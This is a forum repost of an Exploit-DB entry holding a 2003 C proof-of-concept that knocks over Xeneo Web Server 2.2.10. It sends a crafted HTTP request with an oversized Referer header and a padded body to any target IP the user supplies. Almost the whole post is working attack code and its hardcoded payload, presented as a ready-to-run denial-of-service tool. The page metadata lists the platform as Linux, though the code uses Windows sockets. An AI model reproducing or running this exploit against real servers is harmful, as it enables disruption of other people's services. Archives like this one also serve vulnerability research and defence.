Exploit Xeneo Web Server 2.2.10 - Undisclosed Buffer Overflow (PoC)

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
22527
Проверка EDB
  1. Пройдено
Автор
BADPACK3T
Тип уязвимости
DOS
Платформа
LINUX
CVE
N/A
Дата публикации
2003-04-23
C:
/*
source: https://www.securityfocus.com/bid/7410/info

Xeneo web server has been reported prone to an undisclosed buffer overflow vulnerability.

It has been reported that a specifically crafted HTTP request containing malicious HTTP header information will trigger this condition.

Although unconfirmed, this issue may be exploited to execute arbitrary code.

It should also be noted, that although this vulnerability has been reported to affect Xeneo web server version 2.2.10.0 previous versions may also be vulnerable. 
*/

/* Xeneo Web Server 2.2.2.10.0 DoS 
 *
 * Vulnerable systems:
 * Xeneo Web Server 2.2.10.0
 * Vendor:
 * http://www.northernsolutions.com
 *
 * Written and found by badpack3t <[email protected]>
 * For SP Research Labs
 * 04/23/2003
 * 
 * www.security-protocols.com
 *
 * usage: 
 * sp-xeneo2 <targetip> [targetport] (default is 80)
 *
 * big ups 2: 
 * c0nnie, ^Foster, ac1djazz, mp, regulate, stripey, dvdman, hex_, inet
 */

#include <winsock2.h>
#include <stdio.h>

#pragma comment(lib, "ws2_32.lib")

char exploit[] = 

"GET /index.html?testvariable=&nexttestvariable=gif HTTP/1.1\r\n"
"Referer: http://localhost/%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"Connection: Keep-Alive\r\n"
"Cookie: VARIABLE=SPLABS; path=/\r\n"
"User-Agent: Mozilla/4.76 [en] (X11; U; Linux 2.4.2-2 i686)\r\n"
"Variable: result\r\n"
"Host: localhost\r\n"
"Content-length:     513\r\n"
"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png\r\n"
"Accept-Encoding: gzip\r\n"
"Accept-Language: en\r\n"
"Accept-Charset: iso-8859-1,*,utf-8\r\n\r\n\r\n"
"whatyoutyped=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n";

int main(int argc, char *argv[])
{
	WSADATA wsaData;
	WORD wVersionRequested;
	struct hostent 		*pTarget;
	struct sockaddr_in 	sock;
	char *target, buffer[30000];
	int port,bufsize;
	SOCKET mysocket;
	
	if (argc < 2)
	{
		printf("Xeneo Web Server 2.2.10.0 DoS\r\n <[email protected]>\r\n\r\n", argv[0]);
		printf("Tool Usage:\r\n %s <targetip> [targetport] (default is 80)\r\n\r\n", argv[0]);
		printf("www.security-protocols.com\r\n\r\n", argv[0]);
		exit(1);
	}

	wVersionRequested = MAKEWORD(1, 1);
	if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;

	target = argv[1];

	//for default web attacks
	port = 80;

	if (argc >= 3) port = atoi(argv[2]);
	bufsize = 512;
	if (argc >= 4) bufsize = atoi(argv[3]);

	mysocket = socket(AF_INET, SOCK_STREAM, 0);
	if(mysocket==INVALID_SOCKET)
	{	
		printf("Socket error!\r\n");
		exit(1);
	}

	printf("Resolving Hostnames...\n");
	if ((pTarget = gethostbyname(target)) == NULL)
	{
		printf("Resolve of %s failed\n", argv[1]);
		exit(1);
	}

	memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
	sock.sin_family = AF_INET;
	sock.sin_port = htons((USHORT)port);

	printf("Connecting...\n");
	if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) )))
	{
		printf("Couldn't connect to host.\n");
		exit(1);
	}

	printf("Connected!...\n");
	printf("Sending Payload...\n");
	if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1)
	{
		printf("Error Sending the Exploit Payload\r\n");
		closesocket(mysocket);
		exit(1);
	}

	printf("Remote Webserver has been DoS'ed \r\n");
	closesocket(mysocket);
	WSACleanup();
	return 0;
}
 
Источник
www.exploit-db.com

Похожие темы